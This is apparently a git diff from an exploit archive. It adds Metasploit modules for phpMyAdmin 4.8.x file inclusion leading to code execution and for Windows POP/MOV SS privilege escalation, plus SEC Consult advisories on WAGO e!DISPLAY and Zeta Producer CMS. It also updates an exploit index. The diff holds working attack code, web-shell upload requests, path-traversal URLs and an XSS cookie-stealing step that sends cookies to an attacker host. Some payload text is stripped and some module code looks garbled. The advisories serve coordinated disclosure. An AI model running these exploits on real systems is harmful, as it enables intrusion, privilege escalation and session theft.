ARCH_PHP, + 'Targets' => + [ + [ 'Automatic', {} ], + [ 'Windows', {} ], + [ 'Linux', {} ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jun 19 2018')) + + register_options( + [ + OptString.new('TARGETURI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']), + OptString.new('USERNAME', [ true, "Username to authenticate with", 'root']), + OptString.new('PASSWORD', [ false, "Password to authenticate with", '']) + ]) + end + + def check + begin + res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path) }) + rescue + vprint_error("#{peer} - Unable to connect to server") + return Exploit::CheckCode::Unknown + end + + if res.nil? || res.code != 200 + vprint_error("#{peer} - Unable to query /js/messages.php") + return Exploit::CheckCode::Unknown + end + + # v4.8.0 || 4.8.1 phpMyAdmin + if res.body =~ /PMA_VERSION:"(\d+\.\d+\.\d+)"/ + version = Gem::Version.new($1) + vprint_status("#{peer} - phpMyAdmin version: #{version}") + + if version == Gem::Version.new('4.8.0') || version == Gem::Version.new('4.8.1') + return Exploit::CheckCode::Appears + end + return Exploit::CheckCode::Safe + end + + return Exploit::CheckCode::Unknown + end + + def query(uri, qstring, cookies, token) + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, 'import.php'), + 'cookie' => cookies, + 'vars_post' => Hash[{ + 'sql_query' => qstring, + 'db' => '', + 'table' => '', + 'token' => token + }.to_a.shuffle] + }) + end + + def lfi(uri, data_path, cookies, token) + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(uri, 'index.php'), + 'cookie' => cookies, + 'encode_params' => false, + 'vars_get' => { + 'target' => "db_sql.php%253f#{'/..'*16}#{data_path}" + } + }) + end + + def exploit + unless check == Exploit::CheckCode::Appears + fail_with(Failure::NotVulnerable, 'Target is not vulnerable') + end + + uri = target_uri.path + vprint_status("#{peer} - Grabbing CSRF token...") + + response = send_request_cgi({'uri' => uri}) + + if response.nil? + fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage grabbing CSRF token") + elsif response.body !~ /token"\s*value="(.*?)"/ + fail_with(Failure::NotFound, "#{peer} - Couldn't find token. Is URI set correctly?") + end + token = Rex::Text.html_decode($1) + + if target.name =~ /Automatic/ + /\((?Win.*)?\)/ =~ response.headers['Server'] + mytarget = srv.nil? ? 'Linux' : 'Windows' + else + mytarget = target.name + end + + vprint_status("#{peer} - Identified #{mytarget} target") + + #Pull out the last two cookies + cookies = response.get_cookies + cookies = cookies.split[-2..-1].join(' ') + + vprint_status("#{peer} - Retrieved token #{token}") + vprint_status("#{peer} - Retrieved cookies #{cookies}") + vprint_status("#{peer} - Authenticating...") + + login = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(uri, 'index.php'), + 'cookie' => cookies, + 'vars_post' => { + 'token' => token, + 'pma_username' => datastore['USERNAME'], + 'pma_password' => datastore['PASSWORD'] + } + }) + + if login.nil? || login.code != 302 + fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage") + end + + #Ignore the first cookie + cookies = login.get_cookies + cookies = cookies.split[1..-1].join(' ') + vprint_status("#{peer} - Retrieved cookies #{cookies}") + + login_check = send_request_cgi({ + 'uri' => normalize_uri(uri, 'index.php'), + 'vars_get' => { 'token' => token }, + 'cookie' => cookies + }) + + if login_check.nil? + fail_with(Failure::NotFound, "#{peer} - Failed to retrieve webpage") + elsif login_check.body.include? 'Welcome to' + fail_with(Failure::NoAccess, "#{peer} - Authentication failed") + elsif login_check.body !~ /token"\s*value="(.*?)"/ + fail_with(Failure::NotFound, "#{peer} - Couldn't find token. Is URI set correctly?") + end + token = Rex::Text.html_decode($1) + + vprint_status("#{peer} - Authentication successful") + + #Generating strings/payload + database = rand_text_alpha_lower(5) + table = rand_text_alpha_lower(5) + column = rand_text_alpha_lower(5) + col_val = "''" + + + #Preparing sql queries + dbsql = "CREATE DATABASE #{database};" + tablesql = "CREATE TABLE #{database}.#{table}(#{column} varchar(4096) DEFAULT #{col_val});" + dropsql = "DROP DATABASE #{database};" + dirsql = 'SHOW VARIABLES WHERE Variable_Name Like "%datadir";' + + #Create database + res = query(uri, dbsql, cookies, token) + if res.nil? || res.code != 200 + fail_with(Failure::UnexpectedReply, "#{peer} - Failed to create database") + end + + #Create table and column + res = query(uri, tablesql, cookies, token) + if res.nil? || res.code != 200 + fail_with(Failure::UnexpectedReply, "#{peer} - Failed to create table") + end + + #Find datadir + res = query(uri, dirsql, cookies, token) + if res.nil? || res.code != 200 + fail_with(Failure::UnexpectedReply, "#{peer} - Failed to find data directory") + end + + unless res.body =~ /^(.*)?.*?);/ =~ cookies + data_path = "/var/lib/php/sessions/sess_#{session_name}" + end + + res = lfi(uri, data_path, cookies, token) + + #Drop database + res = query(uri, dropsql, cookies, token) + if res.nil? || res.code != 200 + print_error("#{peer} - Failed to drop database #{database}. Might drop when your session closes.") + end + end +end \ No newline at end of file diff --git a/exploits/php/webapps/45014.txt b/exploits/php/webapps/45014.txt new file mode 100644 index 000000000..0b2135eee --- /dev/null +++ b/exploits/php/webapps/45014.txt @@ -0,0 +1,325 @@ +SEC Consult Vulnerability Lab Security Advisory < 20180711-0 > +======================================================================= + title: Remote code execution via multiple attack vectors + product: WAGO e!DISPLAY 7300T - WP 4.3 480x272 PIO1 + vulnerable version: FW 01 - 01.01.10(01) + fixed version: FW 02 + CVE number: CVE-2018-12979, CVE-2018-12980, CVE-2018-12981 + impact: High + homepage: https://www.wago.com/ + found: 2018-04-25 + by: T. Weber (Office Vienna) + SEC Consult Vulnerability Lab + + An integrated part of SEC Consult + Europe | Asia | North America + + https://www.sec-consult.com + +======================================================================= + +Vendor description: +------------------- +"New ideas are the driving force behind our success WAGO is a family-owned +company headquartered in Minden, Germany. Independently operating for three +generations, WAGO is the global leader of spring pressure electrical +interconnect and automation solutions. For more than 60 years, WAGO has +developed and produced innovative products for packaging, transportation, +process, industrial and building automation markets amongst others. Aside from +its innovations in spring pressure connection technology, WAGO has introduced +numerous innovations that have revolutionized industry. Further ground-breaking +inventions include: the WAGO-I/O-SYSTEM®, TOPJOB S® and WALL-NUTS®." + +Source: http://www.wago.us/wago/ + +"For visualization tasks with CODESYS 2 and CODESYS 3: WAGO's new e!DISPLAY +7300T Web Panels help you reinforce the quality of your machinery and equipment +with a refined design and industry-leading software. Learn more about how the +right Web Panels make a difference. + +HMI components are the finishing touch for machines or systems and they have an +overwhelming impact on purchase decisions. WAGO offers aesthetically pleasing +HMIs that leave a lasting impression and significantly increase both the value +and image of your machine or system. WAGO’s e!DISPLAY 7300T Web Panel is +available in 4.3'', 5.7'', 7.0'' and 10.1'' display sizes." + +Source: +http://www.wago.us/products/components-for-automation/operation-and-monitoring/web-panels-edisplay-7300t/overview/index.jsp + + +Business recommendation: +------------------------ +HMI displays are widely used in SCADA infrastructures. The link between +their administrative (or informational) web interfaces and the users which +access these interfaces is critical. The presented attacks demonstrate how +simple it is to inject malicious code in order to break the security of this +link by exploiting minimal user interaction. + +As a consequence a computer which is used for HMI administration should not +provide any possibility to get compromised via malicious script code. + +One possible solution may be e.g.: + * Don't allow email clients + * Don't provide Internet access at all on the HMI stations + +SEC Consult recommends to immediately apply the available patches from the vendor. +A thorough security review should be performed by security professionals to +identify further potential security issues. + + +Vulnerability overview/description: +----------------------------------- +1) Multiple Reflected POST Cross-Site Scripting (CVE-2018-12981) +Reflected cross site scripting vulnerabilities were identified within multiple PHP +scripts in the admin interface. The parameter JSON input which is sent to the +device is not sanitized sufficiently. An attacker can exploit this +vulnerability to execute arbitrary scripts in the context of the attacked user +and gain control over the active session. + +This vulnerability is present for authenticated and unauthenticated users! + + +2) Stored Cross-Site Scripting (CVE-2018-12981) +A stored cross-site scripting vulnerability was identified within the +"PLC List" which can be configured in the web interface of the e!Display. By +storing a payload there, an administrative or guest user can be attacked +without tricking them to visit a malicious web site or clicking on an +malicious link. + +This vulnerability is only present for authenticated users! + + +3) Unrestricted File Upload and File Path Manipulation (CVE-2018-12980) +Arbitrary files can be uploaded to the system without any check. It is even +possible to change the location of the uploaded file on the system. As the +web service does not run as privileged user, it is not possible to upload a +file directly to the web root but on many other locations on the file system. +The normal user 'user' and the administrative user 'admin' can both upload +files to the system. + + +4) Incorrect Default Permissions (CVE-2018-12979) +Due to incorrect default permissions a file in the web root can be overwritten +by the unprivileged 'www' user. This is the same user which is used in the +context of the web server. + + +5) Remote code execution via multiple attack vectors +By stacking vulnerability 1)/2), 3) and 4) with this vulnerability an outside +attacker can place a malicious script on the device in order to execute arbitrary +commands as 'www'. This can be done by uploading a web shell or a reverse +shell. + + +Proof of concept: +----------------- +1) Multiple Reflected POST Cross-Site Scripting (CVE-2018-12981) +The affected endpoints are: +http:///wbm/configtools.php +http:///wbm/login.php +http:///wbm/receive_upload.php + +The following request is an example for reflected XSS within 'configtools.php': +------------------------------------------------------------------------------- +POST /wbm/configtools.php HTTP/1.1 +Host: +Content-type: text/plain +[...] + +{"sessionId":"","aDeviceParams":{"0":{"name":"firewall","parameter":["iptables","--get-xml"],"sudo":true,"multiline":true,"timeout":10000},"1":{"name":"firewall","parameter":["firewall","--is-enabled"],"sudo":true,"multiline":true,"timeout":10000,"dataId":"{DoNotParseAsXml};"}}} +------------------------------------------------------------------------------- + + +Steal the cookie via XSS and send it to http://$attacker:8001?c=: +------------------------------------------------------------------------------- + + + +
+ + +
+ + +------------------------------------------------------------------------------- + + +2) Stored Cross-Site Scripting (CVE-2018-12981) +To exploit this vulnerability malicious code has to be placed in the "PLC List" +by surfing to the endpoint http:///app/index.html and clicking on +the tab "Application->PLC-List". By opening one of the configurable PLCs the +name can be changed in the box "Text:" in order to execute arbitrary script- +code. For example: + + +The payload can also be placed on the device by using the following POST request: +------------------------------------------------------------------------------- +POST /wbm/configtools.php HTTP/1.1 +Host: +[...] + +{"sessionId":" +","aDeviceParams":{"0":{"name":"config_plcselect","parameter":[2,"url=https://127.0.0.1:8001","txt=","vkb=enabled","mon=1"],"sudo":true}}} +------------------------------------------------------------------------------- + + +3) Unrestricted File Upload and File Path Manipulation (CVE-2018-12980) +The file path, the file name and the file content can be manipulated in any +way. There is no server-side check for malicious files. + +------------------------------------------------------------------------------- +POST /wbm/receive_upload.php HTTP/1.1 +Host: +[...] +Content-Type: multipart/form-data; +boundary=---------------------------728140389204955163192597293 + +-----------------------------728140389204955163192597293 +Content-Disposition: form-data; name="touchWbm" + +true +-----------------------------728140389204955163192597293 +Content-Disposition: form-data; name="upload_type" + +font +-----------------------------728140389204955163192597293 +Content-Disposition: form-data; name="session_id" + + +-----------------------------728140389204955163192597293 +Content-Disposition: form-data; name="upload_directory" + +/tmp/ +-----------------------------728140389204955163192597293 +Content-Disposition: form-data; name="font_file"; filename="any_file.sh" +Content-Type: application/x-font-ttf + +any-content #! + + +-----------------------------728140389204955163192597293-- +------------------------------------------------------------------------------- + + +4) Incorrect Default Permissions (CVE-2018-12979) +The file 'index.html' is owned by 'www' and can therefore also be overwritten +with a web shell. + +www@WAGO_eDisplay:/var/www ls -la +drwxr-xr-x 5 root root 488 XXX 99 2018 . +drwxr-xr-x 11 root root 824 XXX 99 2018 .. +lrwxrwxrwx 1 root root 16 XXX 99 2018 app -> /var/www/WagoWBM +-rw-r--r-- 1 www www 345 XXX 99 2018 index.html +drwxr-xr-x 7 root root 776 XXX 99 2018 plclist +drwxr-xr-x 3 root root 368 XXX 99 2018 WagoWBM +drwxr-xr-x 2 root root 688 XXX 99 2018 wbm + + +5) Remote code execution via multiple attack vectors +By uploading a simple PHP shell and overwriting the 'index.html' file located +under the web root an attacker can place a web shell which is reachable without +any authentication. + +------------------------------------------------------------------------------- +POST /wbm/receive_upload.php HTTP/1.1 +Host: +[...] +Content-Type: multipart/form-data; +boundary=---------------------------728140389204955163192597293 + +-----------------------------728140389204955163192597293 +Content-Disposition: form-data; name="touchWbm" + +true +-----------------------------728140389204955163192597293 +Content-Disposition: form-data; name="upload_type" + +font +-----------------------------728140389204955163192597293 +Content-Disposition: form-data; name="session_id" + + +-----------------------------728140389204955163192597293 +Content-Disposition: form-data; name="upload_directory" + +/var/www/ +-----------------------------728140389204955163192597293 +Content-Disposition: form-data; name="font_file"; filename="index.html" +Content-Type: application/x-font-ttf + + +
+
+
+ + + +-----------------------------728140389204955163192597293-- +------------------------------------------------------------------------------- + +The shell can now be reached via "http:///index.html". It is also +possible to upload a reverse-shell to the system which connects to a computer +outside of the actual network. + + +Vulnerable / tested versions: +----------------------------- +The following device with the firmware version has been tested: + +* e!DISPLAY 7300T - WP 4.3 480x272 PIO1 - 01.01.10(01) + +According to WAGO the following e!DISPLAY versions are vulnerable: +762-3000 FW 01 +762-3001 FW 01 +762-3002 FW 01 +762-3003 FW 01 + + +Vendor contact timeline: +------------------------ +2018-04-30: Sending encrypted advisory to VDE CERT for coordination support + (info@cert.vde.com) +2018-05-02: Answer from VDE CERT that WAGO will be informed/contacted +2018-05-08: Status update from VDE CERT +2018-05-23: Asking for status update, no news from WAGO (via VDE CERT) +2018-06-08: VDE CERT: WAGO fixed the vulnerabilities and firmware is in + testing phase +2018-06-12: WAGO requested more time, postponing release date, asking for + affected & fixed versions +2018-06-13: VDE CERT will request CVE numbers +2018-06-17: WAGO scheduled the release for 2018-07-11 +2018-06-26: VDE CERT sends WAGO advisory draft including affected/fixed versions +2018-07-04: VDE CERT sends final WAGO advisory incl. CVE numbers +2018-07-10: VDE CERT publishes security notice: + https://cert.vde.com/de-de/advisories/vde-2018-010 +2018-07-11: SEC Consult advisory release + + +Solution: +--------- +Update the device to the latest available firmware (FW 02). For further +information see the vendor's security notifications page: + +https://www.wago.com/de/automatisierungstechnik/security (German) + +Direct link to English WAGO advisory: +https://www.wago.com/medias/SA-WBM-2018-004.pdf?context=bWFzdGVyfHJvb3R8MjgyNzYwfGFwcGxpY2F0aW9uL3BkZnxoMWUvaDg4LzkzNjE3NTIxOTUxMDIucGRmfDU1NmJkYjEzNDY0ZGU4OWQ1OTMyMjUwNTlmZTI0MzgwNDQ1MDY1YzU3OWRmZDk1NzYzODAwMDI3ODg1NDJlZjU + + + +Workaround: +----------- +Restrict network access to the device, don't allow Internet access from the +HMI station and do not install software from untrusted sources. + + +Advisory URL: +------------- +https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html \ No newline at end of file diff --git a/exploits/php/webapps/45016.txt b/exploits/php/webapps/45016.txt new file mode 100644 index 000000000..43783b06f --- /dev/null +++ b/exploits/php/webapps/45016.txt @@ -0,0 +1,152 @@ +SEC Consult Vulnerability Lab Security Advisory < 20180712-0 > +======================================================================= + title: Remote Code Execution & Local File Disclosure + product: Zeta Producer Desktop CMS + vulnerable version: <=14.2.0 + fixed version: >=14.2.1 + CVE number: CVE-2018-13981, CVE-2018-13980 + impact: critical + homepage: https://www.zeta-producer.com + found: 2017-11-25 + by: P. Morimoto (Office Bangkok) + SEC Consult Vulnerability Lab + + An integrated part of SEC Consult + Europe | Asia | North America + + https://www.sec-consult.com + +======================================================================= + +Vendor description: +------------------- +"With Zeta Producer, the website builder and online shop system for Windows, +you can create and manage your website locally, on your computer. +Get without expertise in 3 steps to your own homepage: select design, +paste content, publish website. Finished." + +Source: https://www.zeta-producer.com/de/index.html + + +Business recommendation: +------------------------ +The vendor provides a patched version which should be installed immediately. + +Users of the product also need to verify that the affected widgets are updated in +the corresponding website project! It could be necessary to rebuild the whole project +or copy the new widgets to the website projects. For further information consult the +vendor. + +Furthermore, an in-depth security analysis is highly advised, as the software may be +affected from further security issues. + + +Vulnerability overview/description: +----------------------------------- +1) Remote Code Execution (CVE-2018-13981) +The email contact functionality of the widget "formmailer" can upload files +to the server but if the user uploads a PHP script with a .php extension +then the server will rename it to .phps to prevent PHP code execution. + +However, the attacker can upload .php5 or .phtml to the server without any +restriction. These alternative file extensions can be executed as PHP code. + +Furthermore, the server will create a folder to store the files, with a +random name using PHP's "uniqid" function. + +Unfortunately, if the server permits directory listing, the attacker +can easily browse to the uploaded PHP script. If no directory listing is +enabled the attacker can still bruteforce the random name to gain remote +code execution via the PHP script as well. Testing on a local server it +took about 20 seconds to brute force the random name. This attack will +be slower over the Internet but it is still feasible. + +Also, if the user runs the Zeta Producer Desktop CMS GUI client locally, +they are also vulnerable because the web server will be running on TCP port 9153. + +The root cause is in the widget "formmailer" which is enabled by default. +The following files are affected: +- /assets/php/formmailer/SendEmail.php +- /assets/php/formmailer/functions.php + + +2) Local File Disclosure (CVE-2018-13980) +If the user enables the widget "filebrowser" on Zeta Producer Desktop CMS an +unauthenticated attacker can read local files by exploiting path traversal issues. + +The following files are affected: +- /assets/php/filebrowser/filebrowser.main.php + + +Proof of concept: +----------------- +1) Remote Code Execution (CVE-2018-13981) +The following python script can be used to exploit the chain of vulnerabilities. +[.. code has been removed to prevent misuses ..] + +When the script is executed, a PHP script (shell) will be uploaded automatically. +# $ python exploit.py +# [+] injecting webshell to http://target/assets/php/formmailer/SendEmail.php +# +# 5a1a5bc991afe +# 5a1a5bc99453a +# 10812 +# [*] Found : http://target/assets/php/formmailer/upload_5a1a5bc992772/sectest.php5 +# uid=33(www-data) gid=33(www-data) groups=33(www-data) + + +2) Local File Disclosure (CVE-2018-13980) +The parameter "file" in the "filebrowser.main.php" script can be exploited to read +arbitrary files from the OS with the privileges of the web server user. +Any unauthenticated user can exploit this issue! + +http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download +http://target/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc&do=list + + +Vulnerable / tested versions: +----------------------------- +The following versions have been tested which were the latest version available +at the time of the test: + +Zeta Producer Desktop CMS 14.1.0 +Zeta Producer Desktop CMS 14.2.0 + +Source: +- https://www.zeta-producer.com/de/download.html +- https://github.com/ZetaSoftware/zeta-producer-content/ + + +Vendor contact timeline: +------------------------ +2017-11-29: Contacting vendor through info@zeta-producer.com and various other + email addresses from the website. No reply. +2017-12-13: Contacting vendor again, extending email address list, no reply +2018-01-09: Contacting vendor again +2018-01-10: Vendor replies, requests transmission of security advisory +2018-01-10: Sending unencrypted security advisory +2018-07-02: There was no feedback from the vendor but the version 14.2.1 fixed + the reported vulnerabilities. +2018-07-12: Public advisory release. + + +Solution: +--------- +Upgrade to version 14.2.1 or newer. See the vendor's download page: + +https://www.zeta-producer.com/de/download.html + +Users of the product also need to verify that the affected widgets are updated in +the corresponding website project! It could be necessary to rebuild the whole project +or copy the new widgets to the website projects. For further information consult the +vendor. + + +Workaround: +----------- +Remove "formmailer" and "filebrowser" widgets. + + +Advisory URL: +------------- +https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html \ No newline at end of file diff --git a/exploits/windows/dos/45017.html b/exploits/windows/dos/45017.html new file mode 100644 index 000000000..eee9b126e --- /dev/null +++ b/exploits/windows/dos/45017.html @@ -0,0 +1,73 @@ + + + + + + + + \ No newline at end of file diff --git a/exploits/windows/local/45024.rb b/exploits/windows/local/45024.rb new file mode 100755 index 000000000..498eea18f --- /dev/null +++ b/exploits/windows/local/45024.rb @@ -0,0 +1,174 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/post/common' +require 'msf/core/post/file' +require 'msf/core/post/windows/priv' +require 'msf/core/post/windows/registry' +require 'msf/core/exploit/exe' + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::Common + include Msf::Post::File + include Msf::Post::Windows::Priv + include Msf::Exploit::EXE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability', + 'Description' => %q{ + This module exploits a vulnerability in a statement in the system programming guide + of the Intel 64 and IA-32 architectures software developer's manual being mishandled + in various operating system kerneles, resulting in unexpected behavior for #DB + excpetions that are deferred by MOV SS or POP SS. + + This module will upload the pre-compiled exploit and use it to execute the final + payload in order to gain remote code execution. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Nick Peterson', # Original discovery (@nickeverdox) + 'Nemanja Mulasmajic', # Original discovery (@0xNemi) + 'Can Bölük ', # PoC + 'bwatters-r7' # msf module + ], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'Targets' => + [ + [ 'Windows x64', { 'Arch' => ARCH_X64 } ] + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'May 08 2018', + 'References' => + [ + ['CVE', '2018-8897'], + ['EDB', '44697'], + ['BID', '104071'], + ['URL', 'https://github.com/can1357/CVE-2018-8897/'], + ['URL', 'https://blog.can.ac/2018/05/11/arbitrary-code-execution-at-ring-0-using-cve-2018-8897/'] + ], + 'DefaultOptions' => + { + 'DisablePayloadHandler' => 'False' + } + )) + + register_options([ + OptString.new('EXPLOIT_NAME', + [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]), + OptString.new('PAYLOAD_NAME', + [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]), + OptString.new('PATH', + [false, 'Path to write binaries (%TEMP% by default).', nil]), + OptInt.new('EXECUTE_DELAY', + [false, 'The number of seconds to delay before executing the exploit', 3]) + ]) + end + + def setup + super + @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) + @payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6)) + @exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i) + @payload_name = "#{payload_name}.exe" unless payload_name.match(/\.exe$/i) + @temp_path = datastore['PATH'] || session.sys.config.getenv('TEMP') + @payload_path = "#{temp_path}\\#{payload_name}" + @exploit_path = "#{temp_path}\\#{exploit_name}" + @payload_exe = generate_payload_exe + end + + def validate_active_host + begin + host = session.session_host + print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}") + rescue Rex::Post::Meterpreter::RequestError => e + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") + raise Msf::Exploit::Failed, 'Could not connect to session' + end + end + + def validate_remote_path(path) + unless directory?(path) + fail_with(Failure::Unreachable, "#{path} does not exist on the target") + end + end + + def validate_target + if sysinfo['Architecture'] == ARCH_X86 + fail_with(Failure::NoTarget, 'Exploit code is 64-bit only') + end + if sysinfo['OS'] =~ /XP/ + fail_with(Failure::Unknown, 'The exploit binary does not support Windows XP') + end + end + + def ensure_clean_destination(path) + if file?(path) + print_status("#{path} already exists on the target. Deleting...") + begin + file_rm(path) + print_status("Deleted #{path}") + rescue Rex::Post::Meterpreter::RequestError => e + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") + print_error("Unable to delete #{path}") + end + end + end + + def ensure_clean_exploit_destination + ensure_clean_destination(exploit_path) + end + + def ensure_clean_payload_destination + ensure_clean_destination(payload_path) + end + + def upload_exploit + local_exploit_path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2018-8897-exe', 'cve-2018-8897-exe.exe') + upload_file(exploit_path, local_exploit_path) + print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}") + end + + def upload_payload + write_file(payload_path, payload_exe) + print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}") + end + + def execute_exploit + sleep(datastore['EXECUTE_DELAY']) + print_status("Running exploit #{exploit_path} with payload #{payload_path}") + output = cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}") + vprint_status(output) + end + + def exploit + begin + validate_active_host + validate_target + validate_remote_path(temp_path) + ensure_clean_exploit_destination + ensure_clean_payload_destination + upload_exploit + upload_payload + execute_exploit + rescue Rex::Post::Meterpreter::RequestError => e + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") + print_error(e.message) + ensure_clean_exploit_destination + ensure_clean_payload_destination + end + end + + attr_reader :exploit_name + attr_reader :payload_name + attr_reader :payload_exe + attr_reader :temp_path + attr_reader :payload_path + attr_reader :exploit_path +end \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index d1651445d..87c8d5bec 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6016,6 +6016,7 @@ id,file,description,date,author,type,platform,port 45011,exploits/windows/dos/45011.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes",2018-07-12,"Google Security Research",dos,windows, 45012,exploits/windows/dos/45012.js,"Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read",2018-07-12,"Google Security Research",dos,windows, 45013,exploits/windows/dos/45013.js,"Microsoft Edge Chakra JIT - Type Confusion with Hoisted SetConcatStrMultiItemBE Instructions",2018-07-12,"Google Security Research",dos,windows, +45017,exploits/windows/dos/45017.html,"G DATA Total Security 25.4.0.3 - Activex Buffer Overflow",2018-07-13,"Filipe Xavier Oliveira",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -9812,6 +9813,7 @@ id,file,description,date,author,type,platform,port 44984,exploits/hardware/local/44984.txt,"ADB Broadband Gateways / Routers - Privilege Escalation",2018-07-05,"SEC Consult",local,hardware, 44989,exploits/windows/local/44989.py,"Boxoft WAV to WMA Converter 1.0 - Local Buffer Overflow (SEH)",2018-07-09,Achilles,local,windows, 45010,exploits/linux/local/45010.c,"Linux Kernel < 4.13.9 (Ubuntu 16.04/Fedora 27) - Local Privilege Escalation",2018-07-10,rlarabee,local,linux, +45024,exploits/windows/local/45024.rb,"Microsoft Windows - POP/MOV SS Local Privilege Elevation (Metasploit)",2018-07-13,Metasploit,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -16608,11 +16610,15 @@ id,file,description,date,author,type,platform,port 44985,exploits/windows/remote/44985.c,"PolarisOffice 2017 8 - Remote Code Execution",2018-07-06,hyp3rlinx,remote,windows, 44987,exploits/windows/remote/44987.txt,"Activision Infinity Ward Call of Duty Modern Warfare 2 - Buffer Overflow",2018-07-09,"Maurice Heumann",remote,windows, 44991,exploits/linux/remote/44991.rb,"HP VAN SDN Controller - Root Command Injection (Metasploit)",2018-07-09,Metasploit,remote,linux,8081 -44992,exploits/linux/remote/44992.rb,"HID discoveryd - 'command_blink_on' Unauthenticated Remote Code Execution (Metasploit)",2018-07-09,Metasploit,remote,linux,4070 +44992,exploits/linux/remote/44992.rb,"HID discoveryd - 'command_blink_on' Remote Code Execution (Metasploit)",2018-07-09,Metasploit,remote,linux,4070 44993,exploits/php/remote/44993.rb,"GitList 0.6.0 - Argument Injection (Metasploit)",2018-07-09,Metasploit,remote,php, 45000,exploits/linux_x86-64/remote/45000.c,"OpenSSH < 6.6 SFTP (x64) - Command Execution",2014-10-08,"Jann Horn",remote,linux_x86-64, 45001,exploits/linux/remote/45001.py,"OpenSSH < 6.6 SFTP - Command Execution",2018-03-20,SECFORCE,remote,linux, -45005,exploits/unix/remote/45005.rb,"IBM QRadar SIEM - Unauthenticated Remote Code Execution (Metasploit)",2018-07-11,Metasploit,remote,unix,443 +45005,exploits/unix/remote/45005.rb,"IBM QRadar SIEM - Remote Code Execution (Metasploit)",2018-07-11,Metasploit,remote,unix,443 +45018,exploits/java/remote/45018.rb,"Manage Engine Exchange Reporter Plus - Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,java,8181 +45019,exploits/linux/remote/45019.rb,"Apache CouchDB - Arbitrary Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,5984 +45020,exploits/php/remote/45020.rb,"phpMyAdmin - (Authenticated) Remote Code Execution (Metasploit)",2018-07-13,Metasploit,remote,php,80 +45025,exploits/linux/remote/45025.rb,"Hadoop YARN ResourceManager - Unauthenticated Command Execution (Metasploit)",2018-07-13,Metasploit,remote,linux,8088 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -26049,7 +26055,7 @@ id,file,description,date,author,type,platform,port 18468,exploits/php/webapps/18468.html,"Flyspray 0.9.9.6 - Cross-Site Request Forgery",2012-02-07,"Vaibhav Gupta",webapps,php, 18470,exploits/php/webapps/18470.txt,"Gazelle CMS 1.0 - Update Statement SQL Injection",2012-02-08,hackme,webapps,php, 18473,exploits/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - Remote File Inclusion",2012-02-08,Vulnerability-Lab,webapps,multiple, -18480,exploits/php/webapps/18480.txt,"Dolibarr 3.2.0 < Alpha - File Inclusion",2012-02-10,Vulnerability-Lab,webapps,php, +18480,exploits/php/webapps/18480.txt,"Dolibarr ERP/CRM 3.2.0 < Alpha - File Inclusion",2012-02-10,Vulnerability-Lab,webapps,php, 18483,exploits/php/webapps/18483.txt,"Fork CMS 3.2.4 - Local File Inclusion / Cross-Site Scripting",2012-02-12,"Avram Marius",webapps,php, 18499,exploits/hardware/webapps/18499.txt,"D-Link DSL-2640B ADSL Router - Cross-Site Request 